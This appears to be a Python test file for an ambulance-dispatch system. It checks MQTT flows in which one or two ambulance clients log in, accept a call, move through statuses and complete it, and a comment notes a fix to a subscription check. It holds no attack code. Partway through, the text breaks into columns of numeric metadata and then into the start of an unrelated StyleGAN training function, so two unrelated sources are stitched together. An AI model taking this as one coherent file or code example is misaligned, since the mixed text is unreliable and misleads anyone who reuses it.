        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # expect blank call
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # expect status completed ambulancecall
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # expect blank ambulancecall
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # Abort call (server-side, not over MQTT)
        call.abort()

        # process messages
        self.loop(test_client, subscribe_client)

        # Check if ambulancecall status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if call status is Ended
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.E.name)

        # Client handshake
        test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # wait for disconnect
        test_client.wait()
        subscribe_client.wait()
class TestMQTTCallsDeclineInTheMiddleRegularUser(TestMQTTCallsDeclineInTheMiddle):
    """Re-run the decline-in-the-middle scenario as a regular (non-admin) user.

    Delegates to the parent test body, substituting non-admin credentials and
    the ambulance that account is authorized to use.
    """

    def test(self):
        # 'testuser2' is the regular-user fixture; self.a3 is its ambulance
        credentials = ('testuser2', 'very_secret', self.a3.id)
        super().test(*credentials)
class TestMQTTCallsMultipleAmbulances(TestMQTT, MQTTTestCase):
    """End-to-end MQTT test of one call assigned to two ambulances, served sequentially.

    A first client logs in, accepts and completes the call for ambulance 1,
    then disconnects; a second client (regular user) logs in afterwards and
    does the same for ambulance 2, after which the call must be Ended.

    Fix: the "expect status ended call" subscription check near the end now
    verifies test_client2 (the client that registered the expectation) instead
    of test_client, which had already disconnected.
    """

    def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'],
             ambulance_id1=None, ambulance_id2=None):

        # default to fixture ambulances when none are given
        if not ambulance_id1:
            ambulance_id1 = self.a1.id
        if not ambulance_id2:
            ambulance_id2 = self.a3.id

        # Start client as admin
        broker = {
            'HOST': 'localhost',
            'PORT': 1883,
            'KEEPALIVE': 60,
            'CLEAN_SESSION': True
        }

        # Start subscribe client
        broker.update(settings.MQTT)
        broker['CLIENT_ID'] = 'test_mqttclient'
        subscribe_client = SubscribeClient(broker,
                                           debug=True)
        self.is_connected(subscribe_client)
        self.is_subscribed(subscribe_client)

        # Start test client
        broker.update(settings.MQTT)
        client_id = 'test_mqtt_subscribe_admin'
        broker['USERNAME'] = username
        broker['PASSWORD'] = password
        broker['CLIENT_ID'] = client_id
        test_client = MQTTTestClient(broker,
                                     check_payload=False,
                                     debug=True)
        self.is_connected(test_client)

        # Client handshake
        test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'online')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # check record
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)

        # check record log
        obj = ClientLog.objects.get(client=clnt)
        self.assertEqual(obj.status, ClientStatus.O.name)

        # Ambulance handshake: ambulance login
        test_client.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id1),
                            'ambulance login')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # check record
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)
        self.assertEqual(clnt.ambulance.id, ambulance_id1)

        # subscribe to call and ambulance call status
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
        self.is_subscribed(test_client)

        # create call using serializer, one ambulance first
        call = {
            'status': CallStatus.P.name,
            'priority': CallPriority.B.name,
            'ambulancecall_set': [
                {
                    'ambulance_id': ambulance_id1,
                    'waypoint_set': [
                        {
                            'order': 0,
                            'location': {
                                'type': LocationType.i.name,
                                'number': '123',
                                'street': 'asdasdasd asd asd asdas'
                            }
                        }
                    ]
                },
                {
                    'ambulance_id': ambulance_id2,
                    'waypoint_set': [
                        {
                            'order': 0,
                            'location': {
                                'type': LocationType.i.name,
                                'number': '123',
                                'street': 'asdasdasd asd asd asdas'
                            }
                        }
                    ]
                }
            ],
            # 'ambulancecall_set': [{'ambulance_id': ambulance_id1}, {'ambulance_id': ambulance_id2}],
            'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
        }
        serializer = CallSerializer(data=call)
        serializer.is_valid()
        call = serializer.save(updated_by=self.u1)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if call status is Pending
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.P.name)

        # Check if ambulancecall status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # Check if ambulancecall status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # test_client publishes client_id to location_client
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
                            json.dumps({
                                'location_client_id': client_id,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "Accepted" to call status
        test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
                                                                                   ambulance_id1, call.id),
                            AmbulanceCallStatus.A.value.casefold())

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # subscribe to call and ambulance call status
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
        self.is_subscribed(test_client)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if call status changed to Started
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.S.name)

        # Check if ambulancecall status changed to accepted
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)

        # Check if ambulancecall status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # subscribe to call and ambulance call status
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "patient bound" to status
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
                            json.dumps({
                                'status': AmbulanceStatus.PB.name,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "at patient" to status
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
                            json.dumps({
                                'status': AmbulanceStatus.AP.name,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "hospital bound" to status
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
                            json.dumps({
                                'status': AmbulanceStatus.HB.name,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "at hospital" to status
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
                            json.dumps({
                                'status': AmbulanceStatus.AH.name,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "completed" to call status
        test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
                                                                                   ambulance_id1, call.id),
                            AmbulanceCallStatus.C.value.casefold())

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # expect 'Completed' ambulancecall
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
        self.is_subscribed(test_client)

        # expect blank ambulancecall
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
        self.is_subscribed(test_client)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if ambulancecall status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if ambulancecall status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # Check if call status is Started (ambulance 2 has not completed yet)
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.S.name)

        # Client handshake
        test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # wait for disconnect
        test_client.wait()

        # Start second test client
        username2 = 'testuser2'
        password2 = 'very_secret'
        client_id2 = 'test_mqtt_subscribe2'
        broker.update(settings.MQTT)
        broker['USERNAME'] = username2
        broker['PASSWORD'] = password2
        broker['CLIENT_ID'] = client_id2
        test_client2 = MQTTTestClient(broker,
                                      check_payload=False,
                                      debug=True)
        self.is_connected(test_client2)

        # Client handshake
        test_client2.publish('user/{}/client/{}/status'.format(username2, client_id2), 'online')

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # check record
        clnt = Client.objects.get(client_id=client_id2)
        self.assertEqual(clnt.status, ClientStatus.O.name)

        # check record log
        obj = ClientLog.objects.get(client=clnt)
        self.assertEqual(obj.status, ClientStatus.O.name)

        # Ambulance handshake: ambulance login
        test_client2.publish('user/{}/client/{}/ambulance/{}/status'.format(username2, client_id2, ambulance_id2),
                             'ambulance login')

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # check record
        clnt = Client.objects.get(client_id=client_id2)
        self.assertEqual(clnt.status, ClientStatus.O.name)
        self.assertEqual(clnt.ambulance.id, ambulance_id2)

        # subscribe ambulance call status
        test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
        self.is_subscribed(test_client2)

        # Check if call status is Started
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.S.name)

        # Check if ambulancecall1 status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if ambulancecall2 status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # test_client publishes client_id to location_client
        test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
                             json.dumps({
                                 'location_client_id': client_id2,
                             }))

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # test_client publishes "Accepted" to call status
        test_client2.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username2, client_id2,
                                                                                    ambulance_id2, call.id),
                             AmbulanceCallStatus.A.value.casefold())

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # subscribe ambulance call status
        test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
        self.is_subscribed(test_client2)

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # Check if call status is Started
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.S.name)

        # Check if ambulancecall1 status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if ambulancecall2 status is accepted
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)

        # subscribe to call
        test_client2.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client2)

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # test_client publishes "patient bound" to status
        test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
                             json.dumps({
                                 'status': AmbulanceStatus.PB.name,
                             }))

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # test_client publishes "at patient" to status
        test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
                             json.dumps({
                                 'status': AmbulanceStatus.AP.name,
                             }))

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # test_client publishes "hospital bound" to status
        test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
                             json.dumps({
                                 'status': AmbulanceStatus.HB.name,
                             }))

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # test_client publishes "at hospital" to status
        test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
                             json.dumps({
                                 'status': AmbulanceStatus.AH.name,
                             }))

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # test_client publishes "completed" to call status
        test_client2.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username2, client_id2,
                                                                                    ambulance_id2, call.id),
                             AmbulanceCallStatus.C.value.casefold())

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # expect status completed ambulancecall
        test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
        self.is_subscribed(test_client2)

        # expect blank ambulancecall
        test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
        self.is_subscribed(test_client2)

        # expect status ended call
        test_client2.expect('call/{}/data'.format(call.id))
        # FIX: was is_subscribed(test_client) — that client already disconnected;
        # the expectation above was registered on test_client2
        self.is_subscribed(test_client2)

        # expect blank call
        test_client2.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client2)

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # Check if ambulancecall1 status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if ambulancecall2 status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if call status is Ended
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.E.name)

        # Client handshake
        test_client2.publish('user/{}/client/{}/status'.format(username2, client_id2), 'offline')

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # wait for disconnect
        test_client2.wait()
        subscribe_client.wait()
# TODO: Create another test where 2 clients to handle two ambulances simultaneously
class TestMQTTCallsMultipleAmbulancesSameTime(TestMQTT, MQTTTestCase):
    """End-to-end MQTT test of one call served by two ambulances concurrently.

    Both clients log in before the call is created; each accepts, progresses
    through the ambulance statuses, and completes its leg, after which the
    call must be Ended.

    Fix: the "expect status ended call" subscription check now verifies
    test_client2 (the client that registered the expectation) instead of
    test_client1.
    """

    def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'],
             ambulance_id1=None, ambulance_id2=None):

        # default to fixture ambulances when none are given
        if not ambulance_id1:
            ambulance_id1 = self.a1.id
        if not ambulance_id2:
            ambulance_id2 = self.a3.id

        # Start client as admin
        broker = {
            'HOST': 'localhost',
            'PORT': 1883,
            'KEEPALIVE': 60,
            'CLEAN_SESSION': True
        }

        # Start subscribe client
        broker.update(settings.MQTT)
        broker['CLIENT_ID'] = 'test_mqttclient'
        subscribe_client = SubscribeClient(broker,
                                           debug=True)
        self.is_connected(subscribe_client)
        self.is_subscribed(subscribe_client)

        # Start test client
        broker.update(settings.MQTT)
        client_id = 'test_mqtt_subscribe_admin'
        broker['USERNAME'] = username
        broker['PASSWORD'] = password
        broker['CLIENT_ID'] = client_id
        test_client1 = MQTTTestClient(broker,
                                      check_payload=False,
                                      debug=True)
        self.is_connected(test_client1)

        # Client handshake
        test_client1.publish('user/{}/client/{}/status'.format(username, client_id), 'online')

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # check record
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)

        # check record log
        obj = ClientLog.objects.get(client=clnt)
        self.assertEqual(obj.status, ClientStatus.O.name)

        # Ambulance handshake: ambulance login
        test_client1.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id1),
                             'ambulance login')

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # check record
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)
        self.assertEqual(clnt.ambulance.id, ambulance_id1)

        # subscribe to call and ambulance call status
        test_client1.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
        self.is_subscribed(test_client1)

        # Start second test client
        username2 = 'testuser2'
        password2 = 'very_secret'
        client_id2 = 'test_mqtt_subscribe2'
        broker.update(settings.MQTT)
        broker['USERNAME'] = username2
        broker['PASSWORD'] = password2
        broker['CLIENT_ID'] = client_id2
        test_client2 = MQTTTestClient(broker,
                                      check_payload=False,
                                      debug=True)
        self.is_connected(test_client2)

        # Client handshake
        test_client2.publish('user/{}/client/{}/status'.format(username2, client_id2), 'online')

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # check record
        clnt = Client.objects.get(client_id=client_id2)
        self.assertEqual(clnt.status, ClientStatus.O.name)

        # check record log
        obj = ClientLog.objects.get(client=clnt)
        self.assertEqual(obj.status, ClientStatus.O.name)

        # Ambulance handshake: ambulance login
        test_client2.publish('user/{}/client/{}/ambulance/{}/status'.format(username2, client_id2, ambulance_id2),
                             'ambulance login')

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # check record
        clnt = Client.objects.get(client_id=client_id2)
        self.assertEqual(clnt.status, ClientStatus.O.name)
        self.assertEqual(clnt.ambulance.id, ambulance_id2)

        # subscribe ambulance call status
        test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
        self.is_subscribed(test_client2)

        # create call using serializer, two ambulances
        call = {
            'status': CallStatus.P.name,
            'priority': CallPriority.B.name,
            'ambulancecall_set': [
                {
                    'ambulance_id': ambulance_id1,
                    'waypoint_set': [
                        {
                            'order': 0,
                            'location': {
                                'type': LocationType.i.name,
                                'number': '123',
                                'street': 'asdasdasd asd asd asdas'
                            }
                        }
                    ]
                },
                {
                    'ambulance_id': ambulance_id2,
                    'waypoint_set': [
                        {
                            'order': 0,
                            'location': {
                                'type': LocationType.i.name,
                                'number': '123',
                                'street': 'asdasdasd asd asd asdas'
                            }
                        }
                    ]
                }
            ],
            'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
        }
        serializer = CallSerializer(data=call)
        serializer.is_valid()
        call = serializer.save(updated_by=self.u1)

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # Check if call status is Pending
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.P.name)

        # Check if ambulancecall status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # Check if ambulancecall status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # test_client publishes client_id to location_client
        test_client1.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
                             json.dumps({
                                 'location_client_id': client_id,
                             }))

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # test_client publishes "Accepted" to call status
        test_client1.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
                                                                                    ambulance_id1, call.id),
                             AmbulanceCallStatus.A.value.casefold())

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # subscribe to call and ambulance call status
        test_client1.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
        self.is_subscribed(test_client1)

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # Check if call status changed to Started
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.S.name)

        # Check if ambulancecall status changed to accepted
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)

        # Check if ambulancecall status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # subscribe to call and ambulance call status
        test_client1.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client1)

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # test_client publishes client_id to location_client
        test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
                             json.dumps({
                                 'location_client_id': client_id2,
                             }))

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # test_client publishes "Accepted" to call status
        test_client2.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username2, client_id2,
                                                                                    ambulance_id2, call.id),
                             AmbulanceCallStatus.A.value.casefold())

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # subscribe ambulance call status
        test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
        self.is_subscribed(test_client2)

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # Check if call status is Started
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.S.name)

        # Check if ambulancecall1 status is accepted
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)

        # Check if ambulancecall2 status is accepted
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)

        # subscribe to call
        test_client2.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client2)

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # will get call because of next call status change
        test_client1.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client1)

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # test_client publishes "patient bound" to status
        test_client1.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
                             json.dumps({
                                 'status': AmbulanceStatus.PB.name,
                             }))

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # test_client2 publishes "patient bound" to status
        test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
                             json.dumps({
                                 'status': AmbulanceStatus.PB.name,
                             }))

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # test_client publishes "at patient" to status
        test_client1.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
                             json.dumps({
                                 'status': AmbulanceStatus.AP.name,
                             }))

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # test_client publishes "at patient" to status
        test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
                             json.dumps({
                                 'status': AmbulanceStatus.AP.name,
                             }))

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # test_client publishes "hospital bound" to status
        test_client1.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
                             json.dumps({
                                 'status': AmbulanceStatus.HB.name,
                             }))

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # test_client publishes "hospital bound" to status
        test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
                             json.dumps({
                                 'status': AmbulanceStatus.HB.name,
                             }))

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # test_client publishes "at hospital" to status
        test_client1.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
                             json.dumps({
                                 'status': AmbulanceStatus.AH.name,
                             }))

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # test_client publishes "completed" to call status
        test_client1.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
                                                                                    ambulance_id1, call.id),
                             AmbulanceCallStatus.C.value.casefold())

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # expect 'Completed' ambulancecall
        test_client1.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
        self.is_subscribed(test_client1)

        # expect blank ambulancecall
        test_client1.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
        self.is_subscribed(test_client1)

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # Check if ambulancecall status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if ambulancecall status is still Accepted
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)

        # Check if call status is Started
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.S.name)

        # test_client publishes "at hospital" to status
        test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
                             json.dumps({
                                 'status': AmbulanceStatus.AH.name,
                             }))

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # test_client publishes "completed" to call status
        test_client2.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username2, client_id2,
                                                                                    ambulance_id2, call.id),
                             AmbulanceCallStatus.C.value.casefold())

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # expect 'Completed' ambulancecall
        test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
        self.is_subscribed(test_client2)

        # expect blank ambulancecall
        test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
        self.is_subscribed(test_client2)

        # expect status ended call
        test_client2.expect('call/{}/data'.format(call.id))
        # FIX: was is_subscribed(test_client1) — the expectation above was
        # registered on test_client2
        self.is_subscribed(test_client2)

        # expect blank call
        test_client2.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client2)

        # expect 'Completed' ambulancecall -> does not receive since it was already made not retain
        # test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
        # self.is_subscribed(test_client)

        # expect blank ambulancecall
        test_client1.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
        self.is_subscribed(test_client1)

        # expect status ended call
        test_client1.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client1)

        # expect blank call
        test_client1.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client1)

        # process messages
        self.loop(test_client2, test_client1)
        subscribe_client.loop()

        # Check if ambulancecall status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if ambulancecall status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if call status is Ended
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.E.name)

        # Client handshake
        test_client1.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')

        # process messages
        self.loop(test_client1)
        subscribe_client.loop()

        # Client handshake
        test_client2.publish('user/{}/client/{}/status'.format(username2, client_id2), 'offline')

        # process messages
        self.loop(test_client2)
        subscribe_client.loop()

        # wait for disconnect
        test_client1.wait()
        test_client2.wait()
        subscribe_client.wait()
| 37.128304
| 148
| 0.583448
| 6,637
| 67,425
| 5.767817
| 0.034202
| 0.061388
| 0.048144
| 0.05828
| 0.962201
| 0.96126
| 0.958987
| 0.958596
| 0.955827
| 0.955147
| 0
| 0.00881
| 0.314868
| 67,425
| 1,815
| 149
| 37.14876
| 0.819872
| 0.15515
| 0
| 0.905804
| 0
| 0
| 0.107419
| 0.060201
| 0
| 0
| 0
| 0.000551
| 0.086584
| 1
| 0.008563
| false
| 0.015224
| 0.011418
| 0
| 0.028544
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85b252c868005a15f7daa9c463988fd149e0da9b
| 14,645
|
py
|
Python
|
src/trainer.py
|
jjeamin/stylegan-pytorch-collections
|
7f2491d585a8e865c5cc4d61666e03308c49e683
|
[
"MIT"
] | 2
|
2021-11-12T10:44:05.000Z
|
2021-11-26T11:07:34.000Z
|
src/trainer.py
|
jjeamin/stylegan
|
7f2491d585a8e865c5cc4d61666e03308c49e683
|
[
"MIT"
] | null | null | null |
src/trainer.py
|
jjeamin/stylegan
|
7f2491d585a8e865c5cc4d61666e03308c49e683
|
[
"MIT"
] | null | null | null |
import torch
from tqdm import tqdm
from src.helper import *
from src.distributed import get_rank, reduce_loss_dict, reduce_sum, get_world_size
from src.non_leaking import augment
from torchvision import transforms, utils
def train_freeze_G(
    args,
    loader,
    generator,
    discriminator,
    g_optim,
    d_optim,
    g_ema,
    device
):
    """StyleGAN2 training loop that fine-tunes only part of the generator.

    When ``args.finetune_loc <= 0`` the whole generator's gradients are toggled
    as a unit each phase; otherwise only the last ``finetune_loc`` pairs of
    conv layers (plus matching to_rgb layers) are toggled, so all earlier
    generator layers — frozen once before the loop — never receive gradients.
    The discriminator is trained normally, with optional adaptive augmentation
    (ADA), R1 regularization every ``d_reg_every`` steps, and path-length
    regularization every ``g_reg_every`` steps.  Samples are written to
    ``sample/`` every 1000 iterations and checkpoints to ``checkpoint/`` every
    10000 iterations (rank 0 only).
    """
    loader = sample_data(loader)

    pbar = range(args.iter)

    # only rank 0 shows a progress bar in distributed runs
    if get_rank() == 0:
        pbar = tqdm(pbar, initial=args.start_iter, dynamic_ncols=True, smoothing=0.01)

    # running state for the regularizers and logging
    mean_path_length = 0
    d_loss_val = 0
    r1_loss = torch.tensor(0.0, device=device)
    g_loss_val = 0
    path_loss = torch.tensor(0.0, device=device)
    path_lengths = torch.tensor(0.0, device=device)
    mean_path_length_avg = 0
